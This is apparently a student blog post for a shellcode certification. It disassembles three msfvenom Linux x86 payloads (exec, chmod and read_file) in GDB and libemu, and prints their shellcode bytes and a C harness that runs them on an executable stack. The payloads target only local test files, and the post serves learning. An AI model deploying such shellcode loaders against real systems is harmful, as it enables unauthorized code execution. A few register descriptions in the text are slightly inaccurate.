In the previous posts, we have looked at creating shellcodes. In this post, I will cover analyses of 3 shellcodes generated using msfvenom. All the shellcodes will be based on Linux x86 architecture. Our aim is to understand how these shellcodes are crafted and what happens in the background i.e. analysis of syscalls, instructions, etc.
Let’s jump directly to the first shellcode.
Linux/x86/exec
Creating a workable exploit
The first one that we are going to look at is Linux/x86/exec payload. We will start with creating a workable exploit for this shellcode. The payload is designed to execute a command provided by the user at the time of creation of payload. The following command generates the payload, which executes “ifconfig”
root@kali:~# msfvenom -p linux/x86/exec CMD=ifconfig -f C [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 44 bytes Final size of c file: 209 bytes unsigned char buf[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x09\x00\x00\x00\x69" "\x66\x63\x6f\x6e\x66\x69\x67\x00\x57\x53\x89\xe1\xcd\x80";
Note that we have used -f flag to get the output in format which can be directly embedded in our C program.
#include <stdio.h> #include <string.h> unsigned char code[] = \ "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x09\x00\x00\x00\x69" "\x66\x63\x6f\x6e\x66\x69\x67\x00\x57\x53\x89\xe1\xcd\x80"; main() { printf("Executing Shellcode... \n"); printf("******************************************************************************\n"); int (*ret)() = (int(*)())code; ret(); }
The final step is to compile this using gcc and then run it. We need to add fno-stack-protector
to unprotect the stack and execstack
to make the stack executable.
root@kali:~/slae/assignments/assignment-5# gcc -fno-stack-protector -z execstack -o linux_x86_exec linux_x86_exec.c linux_x86_exec.c:9:1: warning: return type defaults to ‘int’ [-Wimplicit-int] 9 | main() | ^~~~
Running the shellcode runs “ifconfig” on my system. The output is as shown.
Now that we have a workable exploit for exec shellcode, let’s move on to the analysis part.
What’s under the hood !
There are multiple ways to analyze the shellcode. I am going to use the following approach for this payload:
- Explore the payload using Libemu
- Load the program in GDB and perform step by step analysis
Libemu
Libemu is x86 emulator and is pretty good in analysis of shellcode. For our usage, we can feed in raw input from msfvenom to sctest, which is one of the tools in Libemu library. You can research on tool installation, basic usage, etc. I will jump straight to the analysis.
Feeding sctest with raw exec payload from msfvenom gives the following output:
root@kali:~/slae/assignments/assignment-5# msfvenom -p linux/x86/exec CMD=ifconfig -f raw | sctest -v -Ss 1000 |more [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 44 bytes verbose = 1 execve int execve (const char *dateiname=00416fc0={/bin/sh}, const char * argv[], const char *envp[]); cpu error error accessing 0x00000004 not mapped stepcount 15 int execve ( const char * dateiname = 0x00416fc0 => = "/bin/sh"; const char * argv[] = [ = 0x00416fb0 => = 0x00416fc0 => = "/bin/sh"; = 0x00416fb4 => = 0x00416fc8 => = "-c"; = 0x00416fb8 => = 0x0041701d => = "ifconfig"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0;
As you see, the output is quite clean as it is in C type format. We can deduce the following from the above output:
- The syscall being invoked in execve
- The program being run is /bin/sh
- The argument for this syscall is “/bin/sh -c ifconfig”
As you see, with just a single command, we know how the program was crafted by msfvenom.
To dig deeper and see this shellcode in action, let’s load the executable we generated earlier in GDB.
GDB
GDB will help us step through each instruction and analyse the registers, memory locations, etc. This will provide us deeper understanding.
Using Libemu, we already know that execve syscall is being used, The man reference of execve syscall is as follows:
int execve(const char *pathname, char *const argv[], char *const envp[]);
Based upon information from Linemu analysis, the arguments will map to the following:
Register | Argument | Value |
---|---|---|
EAX | N.A. | 0xb |
EBX | *pathname | /bin/sh |
ECX | argv[] | Address of “/bin/sh -c ifconfig” |
EDX | envp[] | 0 |
Let’s load the program in GDB and disassemble it. The breakpoint was set at code, which is the shellcode.
The above disassembly shows the code for our payload.
Let’s breakup the code for better understanding. The first breakup is as follows:
0x00404040 <+0>: push 0xb 0x00404042 <+2>: pop eax 0x00404043 <+3>: cdq
The initial instructions push 0xb onto the stack and then pops the value in EAX. So, EAX is loaded with 0xb, which is the syscall number for execve. Then, cdq is used to extend the sign bit of EAX(which is 0) to EDX. So, it sets EDX to NULL.
0x00404045 <+5>: pushw 0x632d 0x00404049 <+9>: mov edi,esp
Next, we push null on the stack, followed by 0x632d, which translates to “-c”. The next instruction moves ESP to EDI. So, EDI points to “-c” followed by NULL. The following will make this clearer.
(gdb) break *0x0040404b Breakpoint 2 at 0x40404b (gdb) c Continuing. Breakpoint 2, 0x0040404b in code () (gdb) disassemble $eip,+10 Dump of assembler code from 0x40404b to 0x404055: => 0x0040404b <code+11>: push 0x68732f 0x00404050 <code+16>: push 0x6e69622f End of assembler dump. (gdb) print /x $edi $1 = 0xbffff156 (gdb) x/s 0xbffff156 0xbffff156: "-c"
0x0040404b <+11>: push 0x68732f 0x00404050 <+16>: push 0x6e69622f 0x00404055 <+21>: mov ebx,esp 0x00404057 <+23>: push edx
The next two instructions push “/bin/sh” onto the stack. Then ESP is moved to EBP (*pathname), which now points to “/bin/sh” followed by NULL.
Dump of assembler code from 0x40404b to 0x404055: => 0x0040404b <code+11>: push 0x68732f 0x00404050 <code+16>: push 0x6e69622f End of assembler dump. (gdb) stepi 0x00404050 in code () (gdb) disassemble $eip,+10 Dump of assembler code from 0x404050 to 0x40405a: => 0x00404050 <code+16>: push 0x6e69622f 0x00404055 <code+21>: mov ebx,esp 0x00404057 <code+23>: push edx 0x00404058 <code+24>: call 0x404066 <code+38> End of assembler dump. (gdb) print /x $esp $2 = 0xbffff152 (gdb) x/s 0xbffff152 0xbffff152: "/sh" (gdb) stepi 0x00404055 in code () (gdb) print /x $esp $3 = 0xbffff14e (gdb) x/s 0xbffff14e 0xbffff14e: "/bin/sh"
0x00404058 <+24>: call 0x404066 <code+38> 0x0040405d <+29>: imul esp,DWORD PTR [esi+0x63],0x69666e6f
The next bit is interesting. We encounter a call instruction. The call instruction pushes the address of next instruction to be executed on the stack and then jumps to the defined address. This means 0x0040405d should be pushed on the stack. This is verified below. Also, upon examining this memory address, we can see that this is the actual command of our payload – ifconfig.
(gdb) stepi (gdb) disassemble $eip,+10 Dump of assembler code from 0x404066 to 0x404070: => 0x00404066 <code+38>: push edi 0x00404067 <code+39>: push ebx 0x00404068 <code+40>: mov ecx,esp 0x0040406a <code+42>: int 0x80 0x0040406c <code+44>: add BYTE PTR [eax],al 0x0040406e: add BYTE PTR [eax],al End of assembler dump. (gdb) print /x $esp $5 = 0xbffff146 (gdb) x/w 0xbffff146 0xbffff146: 0x0040405d (gdb) x/s 0x0040405d 0x40405d <code+29>: "ifconfig"
=> 0x00404066 <code+38>: push edi 0x00404067 <code+39>: push ebx 0x00404068 <code+40>: mov ecx,esp 0x0040406a <code+42>: int 0x80
The next instructions push EDI on the stack, which points to “-c” and then ebx, which points to “/bin/sh”. ECX is then loaded with ESP. So, to conclude, ECX(argv) now points to “/bin/sh -c ifconfig”
(gdb) disassemble $eip,+10 Dump of assembler code from 0x404066 to 0x404070: => 0x00404066 <code+38>: push edi 0x00404067 <code+39>: push ebx 0x00404068 <code+40>: mov ecx,esp 0x0040406a <code+42>: int 0x80 0x0040406c <code+44>: add BYTE PTR [eax],al 0x0040406e: add BYTE PTR [eax],al End of assembler dump. (gdb) break *0x0040406a Breakpoint 3 at 0x40406a (gdb) c Continuing. Breakpoint 3, 0x0040406a in code () (gdb) disassemble $eip,+5 Dump of assembler code from 0x40406a to 0x40406f: => 0x0040406a <code+42>: int 0x80 0x0040406c <code+44>: add BYTE PTR [eax],al 0x0040406e: add BYTE PTR [eax],al End of assembler dump. (gdb) print /x $ecx $6 = 0xbffff13e (gdb) x/4w 0xbffff13e 0xbffff13e: 0xbffff14e 0xbffff156 0x0040405d 0x00000000 (gdb) x/s 0xbffff14e 0xbffff14e: "/bin/sh" (gdb) x/s 0xbffff156 0xbffff156: "-c" (gdb) x/s 0x0040405d 0x40405d <code+29>: "ifconfig"
Continuing the program runs ifconfig. This concludes analysis of Linux/x86/exec shellcode.
Linux/x86/chmod
Creating a workable exploit
The next up for analysis is linux/x86/chmod. This payload is aimed to run chmod on specified file with specified mode. We will use msfvenom to create a payload to change the mode to 0777 on file /root/slae/assignments/assignment-5/permtest.txt
root@kali:~# msfvenom -p linux/x86/chmod FILE=/root/slae/assignments/assignment-5/permtest.txt MODE=0777 -f C [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 73 bytes Final size of c file: 331 bytes unsigned char buf[] = "\x99\x6a\x0f\x58\x52\xe8\x31\x00\x00\x00\x2f\x72\x6f\x6f\x74" "\x2f\x73\x6c\x61\x65\x2f\x61\x73\x73\x69\x67\x6e\x6d\x65\x6e" "\x74\x73\x2f\x61\x73\x73\x69\x67\x6e\x6d\x65\x6e\x74\x2d\x35" "\x2f\x70\x65\x72\x6d\x74\x65\x73\x74\x2e\x74\x78\x74\x00\x5b" "\x68\xff\x01\x00\x00\x59\xcd\x80\x6a\x01\x58\xcd\x80";
Embedding the above shellcode in our C skeleton exploit and running it (using the same steps as earlier), we see that the permissions of the file have been modified.
root@kali:~/slae/assignments/assignment-5# ls -l permtest.txt -rw-r--r-- 1 root root 20 Sep 12 07:16 permtest.txt root@kali:~/slae/assignments/assignment-5# ./linux_x86_chmod Shellcode length: 7 root@kali:~/slae/assignments/assignment-5# ls -l permtest.txt -rwxrwxrwx 1 root root 20 Sep 12 07:16 permtest.txt
What’s under the hood !
GDB
For this exploit, we will directly jump into GDB for analysis. Hooking the program and breaking at code brings us to the following screen:
Let’s breakup this code and walk through one section at a time.
Dump of assembler code for function code: => 0x00404040 <+0>: cdq 0x00404041 <+1>: push 0xf 0x00404043 <+3>: pop eax 0x00404044 <+4>: push edx
The code starts with cdq instruction that sets EDX to NULL. Then 0xf is moved to EAX using push and pop instructions. This confirms that the syscall being invoked is chmod. The man reference can now be queried to know the parameters needed for this syscall.
int chmod(const char *pathname, mode_t mode);
Pathname points to the file on which changes need to be made. Mode specifies the new bit mask to be set for the file.
Let’s step into the next section of the instruction.
0x00404045 <+5>: call 0x40407b <code+59> 0x0040404a <+10>: das
The next instruction is a call instruction. This means that the address of the next instruction to be executed will be pushed on the stack. Though this seems gibberish data, querying it confirms that it holds the path of the file on which changes need to be made.
(gdb) x/s 0x0040404a 0x40404a <code+10>: "/root/slae/assignments/assignment-5/permtest.txt"
Let’s step into the next instruction
0x0040407b <+59>: pop ebx 0x0040407c <+60>: push 0x1ff 0x00404081 <+65>: pop ecx 0x00404082 <+66>: int 0x80
The next instruction pops the top of stack (which has the file pathname) in EBX. Then ECX is populated with 0x1ff using push and pop instructions. 0x1ff converts to octal 777, which is the modified file permissions. Post this, the syscall is executed.
The following summarizes the value in registers EAX, EBX and ECX
(gdb) disassemble $eip,+10 Dump of assembler code from 0x404082 to 0x40408c: => 0x00404082 <code+66>: int 0x80 0x00404084 <code+68>: push 0x1 0x00404086 <code+70>: pop eax 0x00404087 <code+71>: int 0x80 0x00404089 <code+73>: add BYTE PTR [eax],al 0x0040408b: add BYTE PTR [eax],al End of assembler dump. (gdb) print /x $eax $1 = 0xf (gdb) print /x $ebx $2 = 0x40404a (gdb) x/s 0x40404a 0x40404a <code+10>: "/root/slae/assignments/assignment-5/permtest.txt" (gdb) print /x $ecx $3 = 0x1ff
Linux/x86/read_file
Creating a workable exploit
The third and the last payload on which we will perform analysis is linux/x86/read_file. This payload when executed reads a file from the file system and writes it to the specified file descriptor.
In our case, let’s create shellcode to read a file on the local system(/root/slae/assignments/assignment-5/readfile.txt) and print it out on the screen(FD=1).
root@kali:~# msfvenom -p linux/x86/read_file FD=1 PATH=/root/slae/assignments/assignment-5/readfile.txt -f C [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 110 bytes Final size of c file: 488 bytes unsigned char buf[] = "\xeb\x36\xb8\x05\x00\x00\x00\x5b\x31\xc9\xcd\x80\x89\xc3\xb8" "\x03\x00\x00\x00\x89\xe7\x89\xf9\xba\x00\x10\x00\x00\xcd\x80" "\x89\xc2\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80\xb8" "\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xc5\xff\xff" "\xff\x2f\x72\x6f\x6f\x74\x2f\x73\x6c\x61\x65\x2f\x61\x73\x73" "\x69\x67\x6e\x6d\x65\x6e\x74\x73\x2f\x61\x73\x73\x69\x67\x6e" "\x6d\x65\x6e\x74\x2d\x35\x2f\x72\x65\x61\x64\x66\x69\x6c\x65" "\x2e\x74\x78\x74\x00";
Following the same steps as we did in the first shellcode, we need to embed this in our C skeleton exploit code and then compile it. Once run, you can see that the file is read and the output is printed on the screen.
Now that we have a workable exploit, let’s move to the analysis part.
What’s under the hood !
GDB
To start with, the program was hooked with GDB and then a breakpoint was set at code, which is the actual shellcode in our exploit. The complete disassembly is shown below:
(gdb) break *&code Breakpoint 1 at 0x4040 (gdb) run Starting program: /root/slae/assignments/assignment-5/linux_x86_read_file Shellcode length: 4 Breakpoint 1, 0x00404040 in code () (gdb) disassemble Dump of assembler code for function code: => 0x00404040 <+0>: jmp 0x404078 <code+56> 0x00404042 <+2>: mov eax,0x5 0x00404047 <+7>: pop ebx 0x00404048 <+8>: xor ecx,ecx 0x0040404a <+10>: int 0x80 0x0040404c <+12>: mov ebx,eax 0x0040404e <+14>: mov eax,0x3 0x00404053 <+19>: mov edi,esp 0x00404055 <+21>: mov ecx,edi 0x00404057 <+23>: mov edx,0x1000 0x0040405c <+28>: int 0x80 0x0040405e <+30>: mov edx,eax 0x00404060 <+32>: mov eax,0x4 0x00404065 <+37>: mov ebx,0x1 0x0040406a <+42>: int 0x80 0x0040406c <+44>: mov eax,0x1 0x00404071 <+49>: mov ebx,0x0 0x00404076 <+54>: int 0x80 0x00404078 <+56>: call 0x404042 <code+2> 0x0040407d <+61>: das 0x0040407e <+62>: jb 0x4040ef 0x00404080 <+64>: outs dx,DWORD PTR ds:[esi] 0x00404081 <+65>: je 0x4040b2 0x00404083 <+67>: jae 0x4040f1 0x00404085 <+69>: popa 0x00404086 <+70>: gs das 0x00404088 <+72>: popa 0x00404089 <+73>: jae 0x4040fe 0x0040408b <+75>: imul esp,DWORD PTR [edi+0x6e],0x746e656d 0x00404092 <+82>: jae 0x4040c3 0x00404094 <+84>: popa 0x00404095 <+85>: jae 0x40410a 0x00404097 <+87>: imul esp,DWORD PTR [edi+0x6e],0x746e656d 0x0040409e <+94>: sub eax,0x65722f35 0x004040a3 <+99>: popa 0x004040a4 <+100>: imul bp,WORD PTR fs:[ebp+eiz*2+0x2e],0x7874 0x004040ac <+108>: je 0x4040ae <code+110> 0x004040ae <+110>: add BYTE PTR [eax],al End of assembler dump.
Let’s break this into sections.
Dump of assembler code for function code: => 0x00404040 <+0>: jmp 0x404078 <code+56> 0x00404042 <+2>: mov eax,0x5 0x00404047 <+7>: pop ebx 0x00404048 <+8>: xor ecx,ecx 0x0040404a <+10>: int 0x80 0x0040404c <+12>: mov ebx,eax 0x0040404e <+14>: mov eax,0x3 0x00404053 <+19>: mov edi,esp 0x00404055 <+21>: mov ecx,edi 0x00404057 <+23>: mov edx,0x1000 0x0040405c <+28>: int 0x80 0x0040405e <+30>: mov edx,eax 0x00404060 <+32>: mov eax,0x4 0x00404065 <+37>: mov ebx,0x1 0x0040406a <+42>: int 0x80 0x0040406c <+44>: mov eax,0x1 0x00404071 <+49>: mov ebx,0x0 0x00404076 <+54>: int 0x80 0x00404078 <+56>: call 0x404042 <code+2> 0x0040407e <+62>: jb 0x4040ef
Here is how the first syscall unfolds. The first one is classic JMP-CALL-POP technique. The value is popped in EBX register. If you evaluate the value closely, it is nothing but the file that needs to be read.
(gdb) x/s 0x0040407e 0x40407e <code+62>: "root/slae/assignments/assignment-5/readfile.txt"
Also, EAX is populated with 0x5, which is the syscall number for open sycall. Post that, ECX is XORed to NULL. The man reference of open syscall is shown below:
int open(const char *pathname, int flags)
Comparing this to the values populated in the registers, we can confirm that EAX is loaded with the syscall number. EBX has pointer to the pathname and the flags is set to 0 using ECX. Post this, the open syscall is initiated and our file is opened.
Now, let’s look at the second syscall.
0x0040404c <+12>: mov ebx,eax 0x0040404e <+14>: mov eax,0x3 0x00404053 <+19>: mov edi,esp 0x00404055 <+21>: mov ecx,edi 0x00404057 <+23>: mov edx,0x1000 0x0040405c <+28>: int 0x80
Looking at the value 0x3 being loaded in the EAX, register, we know that this is the read syscall. EBX is first loaded with value in EAX, which the file descriptor returned from the open syscall. The man reference of read syscall is as follows:
ssize_t read(int fd, void *buf, size_t count);
We already have EAX populated with the sycall number and EBX with fd, which is the file descriptor of the file to be read. The next instructions moves the value of ESP in ECX, which is the second argument – *buf. This points to a valid stack value to read the file into the buffer. In the next instruction, EDX is set to 0x1 for the third argument – count, which translates to 4096 in decimal. After this, the syscall is invoked.
Our next step is to write the output back. In this case, the output is written on the screen. Let’s look at the next syscall to demystify this.
0x0040405e <+30>: mov edx,eax 0x00404060 <+32>: mov eax,0x4 0x00404065 <+37>: mov ebx,0x1 0x0040406a <+42>: int 0x80 0x0040406c <+44>: mov eax,0x1 0x00404071 <+49>: mov ebx,0x0 0x00404076 <+54>: int 0x80
As we see that EAX is loaded with 0x4, which is the write syscall, let’s look at man reference of this syscall:
ssize_t write(int fd, const void *buf, size_t count);
The first instruction moves value of EAX, which is the return value of last syscall in EDX. This basically populates EDX, which should hold the value of argument count with the number of bytes read (returned from last syscall).
Then EBX is loaded with 1, which is the value of file descriptor fd. That means that the output will be written to STDOUT. Post this, the sycall is invoked and we see the output on the screen.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3
Student ID: PA-16521
The code is also stored at GitHub. Thanks for reading !